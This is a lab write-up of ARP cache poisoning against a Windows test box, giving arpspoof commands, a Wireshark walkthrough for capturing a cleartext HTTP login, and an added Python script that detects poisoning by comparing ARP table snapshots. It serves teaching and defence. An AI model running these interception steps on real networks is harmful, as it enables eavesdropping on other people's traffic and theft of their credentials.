# ARP Cache poisoning

### Setup

Install arpspoof on Kali Linux; it ships as part of the dsniff package (in my case it was not working before...)

> sudo apt install dsniff

Attacker IP: 192.168.71.131 (Kali Linux)

Target IP: 192.168.71.149 (Win10 Box)

Gateway IP: 192.168.71.1

> netstat -nr

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-Mhi4v8FiqtnBNIy4ydf%2Fmitm01.png?alt=media\&token=aca12a66-2b85-49d8-bdb5-f71d40566d99)

Let's ping the target IP and the gateway, then check the ARP cache:

> arp

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-Mhi5nlpSnxAbwfmN57N%2Fmitm02.png?alt=media&#x26;token=4dae8df5-7c17-42f4-abcd-086e73df2bd4" alt="arp cache"></div>

Attacker MAC Address:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiA2EjdLafhJ2zfZT5%2Fmitm03.png?alt=media&#x26;token=d21a6bf5-5228-4e42-a526-7f59cdb52370" alt=""></div>

ARP Cache on target before attack:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiHvQh7Tmo8IIe3lHf%2Fmitm06.png?alt=media&#x26;token=cba5547e-7903-422c-adb1-47f3d2cb3fed" alt=""></div>

### ARP Cache Poisoning

> arpspoof -i eth1 -t 192.168.71.1 192.168.71.149
>
> arpspoof -i eth1 -t 192.168.71.149 192.168.71.1

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiGlycuaLcoVxJirmo%2Fmitm04.png?alt=media&#x26;token=cf4b29e1-a4b4-49fc-bdce-3419dd00800a" alt=""></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiGtcFvFzm5r1Tkpgx%2Fmitm05.png?alt=media&#x26;token=1713ad03-efa8-4782-b027-ce1fa4de294f" alt=""></div>

ARP Cache on target after the attack (the gateway IP now resolves to the attacker's MAC address):

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiIxDLfvk0aS11NeAC%2Fmitm07.png?alt=media&#x26;token=555b089b-cc88-4358-8929-b7f51d81a0f2" alt=""></div>
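The before/after ARP cache screenshots above are exactly what a host-side monitor can compare to spot this attack. The following is an added example, not part of the original lab write-up: a small Python check that parses two snapshots of a host's ARP table (Windows `arp -a`, Linux `arp -n` or `ip neigh` output) and flags the two symptoms shown on this page: the gateway's MAC address changing between snapshots, and two IP addresses (gateway and victim) resolving to the same MAC. The sample outputs are constructed to mirror the lab (IPs from this page), and the MAC addresses are placeholders, not the real ones from the screenshots.

```python
"""Detect ARP cache poisoning by comparing ARP table snapshots (added example).

Checks two symptoms of the attack shown in the lab:
  1. the gateway's MAC address changed between a baseline and a later snapshot;
  2. several IP addresses now map to one MAC (one NIC answering for gateway
     and victim at once).
"""
import re

_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# MAC in Windows ("aa-bb-cc-dd-ee-ff") or Linux ("aa:bb:cc:dd:ee:ff") notation.
_MAC_RE = re.compile(r"\b(?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2}\b")


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` (Windows), `arp -n` or `ip neigh` (Linux).

    MACs are normalised to lowercase colon form. Lines without both an IP and a
    MAC (headers, incomplete entries) are skipped, as are group/broadcast MACs,
    which legitimately repeat across multicast entries.
    """
    table = {}
    for line in text.splitlines():
        ip_m, mac_m = _IP_RE.search(line), _MAC_RE.search(line)
        if not ip_m or not mac_m:
            continue
        mac = mac_m.group(0).lower().replace("-", ":")
        if int(mac[:2], 16) & 1:  # I/G bit set: multicast or broadcast, not a host
            continue
        table[ip_m.group(0)] = mac
    return table


def detect_poisoning(baseline, current, gateway_ip):
    """Compare two parsed tables and return a list of human-readable findings."""
    findings = []
    before, after = baseline.get(gateway_ip), current.get(gateway_ip)
    if before and after and before != after:
        findings.append(f"gateway {gateway_ip} MAC changed {before} -> {after}")
    by_mac = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return findings


# Constructed `arp -a` output from the Windows target before the attack.
# MAC addresses are placeholders (00:50:56:aa:aa:01 = gateway, 00:0c:29:bb:bb:02 = attacker).
BEFORE = """\
Interface: 192.168.71.149 --- 0x5
  Internet Address      Physical Address      Type
  192.168.71.1          00-50-56-aa-aa-01     dynamic
  192.168.71.131        00-0c-29-bb-bb-02     dynamic
  192.168.71.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed output after poisoning: the gateway now resolves to the attacker's MAC.
AFTER = """\
Interface: 192.168.71.149 --- 0x5
  Internet Address      Physical Address      Type
  192.168.71.1          00-0c-29-bb-bb-02     dynamic
  192.168.71.131        00-0c-29-bb-bb-02     dynamic
  192.168.71.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed `ip neigh` output for the same poisoned state on a Linux host,
# to show the parser handles that format too.
AFTER_LINUX = """\
192.168.71.1 dev eth1 lladdr 00:0c:29:bb:bb:02 REACHABLE
192.168.71.131 dev eth1 lladdr 00:0c:29:bb:bb:02 STALE
"""

if __name__ == "__main__":
    for finding in detect_poisoning(parse_arp_table(BEFORE), parse_arp_table(AFTER), "192.168.71.1"):
        print("ALERT:", finding)
```

In practice you would take the baseline right after boot (or pin the gateway entry with a static ARP entry) and re-run the comparison periodically; the duplicate-MAC check is the more robust of the two, because it needs no baseline at all.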

### Grab credentials

On Kali Linux, start Wireshark and capture on the eth1 interface.

On the Windows box, navigate to <http://testphp.vulnweb.com/login.php>

Enter some sample credentials here: test / SecurePassw0rd

In Wireshark, apply the display filter http and locate the POST request.

Follow the HTTP stream:

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiQ0jsBv0bDRYEz3-3%2Fmitm08.png?alt=media\&token=e805b725-d819-4c56-8c51-a41ac29955b9)

Follow the POST request:

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiQCM2rfnj55TgtJvI%2Fmitm09.png?alt=media\&token=c5e0ec71-0b9a-4656-be71-789cf469935d)

Note: HTTP is unencrypted, so the password is visible in cleartext.

If the connection were HTTPS instead, it would be much harder (or impossible) to grab the password.
